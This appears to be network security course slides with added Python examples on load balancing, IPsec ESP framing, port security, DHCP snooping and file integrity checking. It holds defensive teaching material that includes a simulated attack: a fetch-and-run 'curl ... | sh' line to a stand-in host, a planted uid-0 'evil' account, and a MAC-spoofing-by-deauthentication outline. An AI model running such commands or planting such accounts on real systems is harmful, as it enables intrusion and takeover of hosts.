Network Security: Hosted By: Ed-Lab Pakistan and Risk Associates
• Active-passive
• Active-active
ROUND ROBIN
Round robin network load balancing rotates connection requests among web servers in the
order that requests are received. For a simplified example, assume that an enterprise has a
cluster of three servers: Server A, Server B, and Server C.
• The first request is sent to Server A.
• The second request is sent to Server B.
• The third request is sent to Server C.
• The load balancer continues passing requests to servers in this order. Requests are spread evenly by count, regardless of each server's capacity or current load, so a slow or unhealthy server still receives its full share unless health checks remove it from the rotation.
DIFFERENCE BETWEEN WEIGHTED AND ROUND ROBIN LOAD BALANCING
• The weighted round robin load balancing algorithm allows site administrators to assign weights to each server based on criteria like traffic-handling capacity. Servers with higher weights receive a higher proportion of client requests. For a simplified example, assume that an enterprise has a cluster of three servers:
– Server A can handle 15 requests per second, on average
– Server B can handle 10 requests per second, on average
– Server C can handle 5 requests per second, on average
• Next, assume that the load balancer receives 6 requests:
– 3 requests are sent to Server A
– 2 requests are sent to Server B
– 1 request is sent to Server C
• In this manner, the weighted round robin algorithm distributes the load according to each server's capacity (here in the ratio 15:10:5, i.e. 3:2:1).
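The two schemes above, as an added example that is not code from the course material: plain round robin, and a weighted round robin built from the 15/10/5 capacities in the slide. The weighted variant uses the smooth weighted round robin algorithm (the one nginx's upstream module uses) so that Server A's three picks per six requests are interleaved with B and C instead of sent as a burst; the class and function names are my own.

```python
from collections import Counter
from functools import reduce
from math import gcd


class RoundRobin:
    """Plain round robin: each new connection goes to the next server in order."""

    def __init__(self, servers):
        self.servers = list(servers)
        self._next = 0

    def pick(self):
        server = self.servers[self._next]
        self._next = (self._next + 1) % len(self.servers)
        return server


class WeightedRoundRobin:
    """Smooth weighted round robin: servers are chosen in proportion to their weights,
    but consecutive picks are spread out (A, B, A, C, B, A for weights 3:2:1)."""

    def __init__(self, capacities):
        # capacities: {server: requests per second}. Dividing by the GCD turns
        # 15:10:5 into the weights 3:2:1 used in the slide.
        g = reduce(gcd, capacities.values())
        self.weight = {name: cap // g for name, cap in capacities.items()}
        self.current = {name: 0 for name in capacities}
        self.total = sum(self.weight.values())

    def pick(self):
        # every server accumulates its weight; the largest accumulator wins and
        # pays back the total, so over one cycle each server wins `weight` times
        for name in self.current:
            self.current[name] += self.weight[name]
        best = max(self.current, key=self.current.get)
        self.current[best] -= self.total
        return best


def distribute(balancer, n):
    """Send n requests through a balancer and count how many each server got."""
    return Counter(balancer.pick() for _ in range(n))


if __name__ == "__main__":
    print(distribute(RoundRobin(["A", "B", "C"]), 6))
    print(distribute(WeightedRoundRobin({"A": 15, "B": 10, "C": 5}), 6))
```

Both balancers are deliberately stateless about server health; in production the pool members are removed from rotation when a health check fails, otherwise a degraded server keeps receiving its full share.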
SECURITY / SEGMENTATION MODELS
• Physical
• Logical
• Virtualization
• Air Gapping
PHYSICAL
• Physical segmentation places systems on separate hardware; by implementing VLANs, systems that share the same physical switch can be placed logically on separate networks
PHYSICAL / LOGICAL
• The castle-and-moat philosophy, where everything behind the firewalls was thought to be safe, is no longer valid
• Internal and external traffic should both be monitored, and nothing implicitly trusted (internal or external)
• Micro-segmentation and granular access, providing only the level of permissions required
1. MFA
2. IAM
3. Orchestration
4. Analytics
5. Encryption
VIRTUAL PRIVATE NETWORK (VPN)
• Security comes from the tunneling protocol (e.g. PPTP) and the encryption method (e.g. IPsec). PPTP is obsolete: its MS-CHAPv2 authentication and MPPE encryption are broken, so it should not be relied on for confidentiality; use IPsec (IKEv2) or a TLS-based VPN instead.
VPN
Many companies provide VPN access to their remote employees so they can reach corporate resources from an offsite location
– Access can be restricted to only certain parts of the corporate network
SPLIT TUNNEL
Split tunnel allows a user to access one set of resources via the firewall/VPN while other traffic (e.g. internet websites) leaves the local network directly. The direct path bypasses the corporate firewall and inspection, so with split tunnelling the endpoint's own controls are all that protect it on the internet side, and a compromised endpoint has a path into the corporate network.
TRANSPORT ENCRYPTION
• IPsec
– Encapsulating Security Payload (ESP)
• Provides confidentiality along with optional integrity checking (authentication)
• Adds a header (SPI and sequence number), a trailer (padding, pad length, next header) and an integrity check value (ICV)
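The ESP framing described above, as an added example (not from the course material): a sender that wraps a payload in the ESP header and trailer and appends an ICV, and a receiver that verifies the ICV, enforces an anti-replay window on the sequence number, and strips the framing. The standard library has no AES, so this uses NULL encryption (ESP-NULL, RFC 2410) with an HMAC-SHA-256-128 ICV (RFC 4868); that keeps the header, trailer and ICV visible, which is the point of the slide. Names, keys and the sample payload are my own.

```python
import hashlib
import hmac
import struct

# ESP packet layout (RFC 4303):
#   header  : SPI (4 bytes) | sequence number (4 bytes)
#   payload : the protected data (sent in the clear here: ESP-NULL, RFC 2410)
#   trailer : padding (0..255 bytes) | pad length (1) | next header (1)
#   ICV     : HMAC-SHA-256 truncated to 128 bits over header + payload + trailer
ESP_HDR = struct.Struct("!II")
ICV_LEN = 16
IPPROTO_UDP = 17


def esp_encapsulate(spi, seq, payload, next_header, auth_key):
    """Build one ESP packet: header | payload | trailer | ICV."""
    # ESP-NULL requires payload + padding + the 2 trailer bytes to end on a 4-byte boundary
    pad_len = (-(len(payload) + 2)) % 4
    padding = bytes(range(1, pad_len + 1))              # RFC 4303 default padding 1,2,3,...
    trailer = padding + bytes([pad_len, next_header])
    authenticated = ESP_HDR.pack(spi, seq) + payload + trailer
    icv = hmac.new(auth_key, authenticated, hashlib.sha256).digest()[:ICV_LEN]
    return authenticated + icv


class EspReceiver:
    """Verifies the ICV, enforces a sliding anti-replay window, strips header and trailer."""

    def __init__(self, spi, auth_key, window=64):
        self.spi, self.key, self.window = spi, auth_key, window
        self.highest = 0        # highest sequence number accepted so far
        self.seen = set()       # accepted sequence numbers still inside the window

    def decapsulate(self, packet):
        if len(packet) < ESP_HDR.size + 2 + ICV_LEN:
            raise ValueError("packet too short to be ESP")
        body, icv = packet[:-ICV_LEN], packet[-ICV_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()[:ICV_LEN]
        if not hmac.compare_digest(icv, expected):      # constant-time compare
            raise ValueError("ICV mismatch: packet modified in transit or wrong key")
        spi, seq = ESP_HDR.unpack_from(body)
        if spi != self.spi:
            raise ValueError(f"unknown SPI {spi:#x}")
        pad_len, next_header = body[-2], body[-1]
        if pad_len > len(body) - ESP_HDR.size - 2:
            raise ValueError("pad length exceeds packet")
        # anti-replay: reject anything below the window or already accepted
        if seq <= self.highest - self.window or seq in self.seen:
            raise ValueError(f"replayed or stale sequence number {seq}")
        self.seen.add(seq)
        self.highest = max(self.highest, seq)
        self.seen = {s for s in self.seen if s > self.highest - self.window}
        payload = body[ESP_HDR.size:len(body) - 2 - pad_len]
        return next_header, payload


if __name__ == "__main__":
    key = bytes(range(32))                              # constructed demo key
    packet = esp_encapsulate(0x1001, 1, b"hello", IPPROTO_UDP, key)
    print(packet.hex())
    print(EspReceiver(0x1001, key).decapsulate(packet))
```

Swapping NULL for a real cipher changes only the payload bytes and the alignment (the block size instead of 4); the header, trailer and ICV handling stay exactly as shown. The ICV is checked before anything in the packet is trusted, including the sequence number.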
NETWORK ACCESS CONTROL (NAC)
• Configure a switch so that it only learns one MAC address per port (port security)
– Keeps attackers from flooding the switch with multiple fake MAC addresses
– Can be set to trigger an alert on violation
– A MAC address can be hard-coded to a particular port
• Can be used in conjunction with 802.1X to strengthen security at the wall jack
DHCP SNOOPING
DHCP snooping is a layer 2 security feature that guards against rogue DHCP servers: switch ports are marked trusted (toward the legitimate DHCP server) or untrusted, and DHCP server messages (OFFER, ACK, NAK) arriving on untrusted ports are dropped
• Switches can also be configured to drop malicious or malformed DHCP packets, and to build a binding table of client MAC address, leased IP and port
• When a violation is detected, the event should be logged and alerts generated for further follow-up/action
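The port security and DHCP snooping behaviour from the two sections above, as an added example that is not code from the course material: a simulated switch that learns at most one MAC per port, drops DHCP server messages on untrusted ports, rejects client requests whose hardware address does not match the frame's source MAC, and builds a binding table from ACKs on the trusted port. The port names, MAC addresses, IPs and the frame sequence are constructed for the demo.

```python
from collections import defaultdict

DHCP_SERVER_MSGS = {"OFFER", "ACK", "NAK"}        # only a DHCP server sends these


class SecureSwitch:
    """Port security (one learned MAC per port by default) plus DHCP snooping."""

    def __init__(self, trusted_ports=(), max_macs_per_port=1):
        self.trusted = set(trusted_ports)        # ports that lead to the real DHCP server
        self.max_macs = max_macs_per_port
        self.mac_table = defaultdict(set)        # port -> learned source MACs
        self.pending = {}                        # client MAC -> port it asked from
        self.bindings = {}                       # client MAC -> (leased IP, port)
        self.alerts = []                         # what would be logged and alerted on

    def ingress(self, port, src_mac, dhcp=None):
        """Process one frame arriving on `port`; returns True if it is forwarded."""
        learned = self.mac_table[port]
        if src_mac not in learned:
            if len(learned) >= self.max_macs:            # port-security violation
                self.alerts.append(f"port-security: {src_mac} on {port} exceeds limit {self.max_macs}")
                return False
            learned.add(src_mac)
        if dhcp is None:
            return True
        kind = dhcp["type"]
        if port not in self.trusted:
            if kind in DHCP_SERVER_MSGS:                  # rogue DHCP server
                self.alerts.append(f"dhcp-snooping: rogue {kind} from {src_mac} on untrusted {port}")
                return False
            if dhcp["client_mac"] != src_mac:             # forged chaddr, e.g. DHCP starvation
                self.alerts.append(f"dhcp-snooping: chaddr {dhcp['client_mac']} != source {src_mac} on {port}")
                return False
            self.pending[dhcp["client_mac"]] = port
        elif kind == "ACK" and dhcp["client_mac"] in self.pending:
            self.bindings[dhcp["client_mac"]] = (dhcp["yiaddr"], self.pending.pop(dhcp["client_mac"]))
        return True


def run_demo():
    """Replay a constructed frame sequence: a normal lease, a rogue OFFER, a forged
    DISCOVER and a second MAC on a secured port. Returns (switch, per-frame verdicts)."""
    sw = SecureSwitch(trusted_ports={"Gi0/24"})
    client, server, rogue = "aa:aa:aa:aa:aa:01", "00:11:22:33:44:55", "de:ad:be:ef:00:01"
    frames = [  # (ingress port, source MAC, DHCP fields or None for a plain frame)
        ("Gi0/1", client, {"type": "DISCOVER", "client_mac": client}),
        ("Gi0/24", server, {"type": "OFFER", "client_mac": client, "yiaddr": "10.0.0.50"}),
        ("Gi0/2", rogue, {"type": "OFFER", "client_mac": client, "yiaddr": "10.0.0.66"}),
        ("Gi0/1", client, {"type": "REQUEST", "client_mac": client}),
        ("Gi0/24", server, {"type": "ACK", "client_mac": client, "yiaddr": "10.0.0.50"}),
        ("Gi0/3", "cc:cc:cc:cc:cc:03", {"type": "DISCOVER", "client_mac": "cc:cc:cc:cc:cc:99"}),
        ("Gi0/1", "aa:aa:aa:aa:aa:02", None),
    ]
    return sw, [sw.ingress(*frame) for frame in frames]


if __name__ == "__main__":
    switch, verdicts = run_demo()
    print(verdicts)
    print(*switch.alerts, sep="\n")
    print(switch.bindings)
```

The binding table is what features such as dynamic ARP inspection and IP source guard consult afterwards, which is why DHCP snooping is usually the first of the three to be enabled.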
MAC FILTERING
• MAC filtering predefines which Media Access Control (MAC) addresses can connect to the router or access point.
• This won't prevent a skilled attacker from spoofing an allowed MAC address
• MAC addresses are very easy to spoof
– Tools available in Kali Linux, such as the aircrack-ng suite and Wireshark, allow an attacker to listen to the network and discover valid MAC addresses
– Use aireplay-ng (part of the aircrack-ng suite) to send deauthentication frames to the client, then set the attacker's interface to the client's MAC address and connect in its place
– Can be done manually or even faster via scripts
JUMP SERVER
• Integrity checks protect against tampering by ensuring a file hasn't been modified
– Credentials
– Privileges and security settings
– Content
– Attributes and size
– Hash values
• Compares the current state against a known good state
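The integrity check described in the list above, as an added example that is not code from the course material: a baseline of every file's SHA-256 hash, size, permission mode and owner, and a comparison that reports files that changed, disappeared or appeared. The demo tree, its contents and the tampering steps (an account appended to a passwd file, a SUID bit set on a binary, a banner removed, a dropper planted) are constructed inside a temporary directory; paths and names are my own.

```python
import hashlib
import os
import stat
import tempfile

CHUNK = 1 << 16


def snapshot(path):
    """Record the attributes an integrity checker compares for one file."""
    st = os.lstat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            digest.update(chunk)
    return {
        "sha256": digest.hexdigest(),
        "size": st.st_size,
        "mode": stat.filemode(st.st_mode),   # e.g. "-rw-r--r--"; catches a newly set SUID bit
        "uid": st.st_uid,
        "gid": st.st_gid,
    }


def baseline(root):
    """Known-good state: relative path -> snapshot, for every regular file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if stat.S_ISREG(os.lstat(full).st_mode):
                result[os.path.relpath(full, root).replace(os.sep, "/")] = snapshot(full)
    return result


def compare(known_good, current):
    """Diff the current state against the baseline; returns sorted (path, finding) pairs."""
    findings = []
    for rel, good in known_good.items():
        now = current.get(rel)
        if now is None:
            findings.append((rel, "missing"))
            continue
        changed = [k for k in good if good[k] != now[k]]
        if changed:
            findings.append((rel, "changed " + ",".join(changed)))
    for rel in current.keys() - known_good.keys():
        findings.append((rel, "unexpected new file"))
    return sorted(findings)


def run_demo():
    """Build a tiny tree, baseline it, tamper with it, and return what the check catches."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data, mode=0o644):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as f:
                f.write(data)
            os.chmod(full, mode)

        write("etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
        write("etc/motd", "welcome\n")
        write("bin/ls", "#!/bin/sh\nexec /usr/bin/ls \"$@\"\n", 0o755)
        known_good = baseline(root)

        # tampering: extra uid-0 account, SUID bit on a binary, banner removed, dropper planted
        with open(os.path.join(root, "etc/passwd"), "a") as f:
            f.write("evil:x:0:0::/root:/bin/bash\n")
        os.chmod(os.path.join(root, "bin/ls"), 0o4755)
        os.remove(os.path.join(root, "etc/motd"))
        write("tmp/dropper.sh", "curl http://example.invalid/x | sh\n")

        return compare(known_good, baseline(root))


if __name__ == "__main__":
    for path, finding in run_demo():
        print(f"{path}: {finding}")
```

The baseline itself is the known-good state and must be stored somewhere the monitored host cannot rewrite (signed, or on a separate system), otherwise an attacker who can modify the files can re-baseline them too.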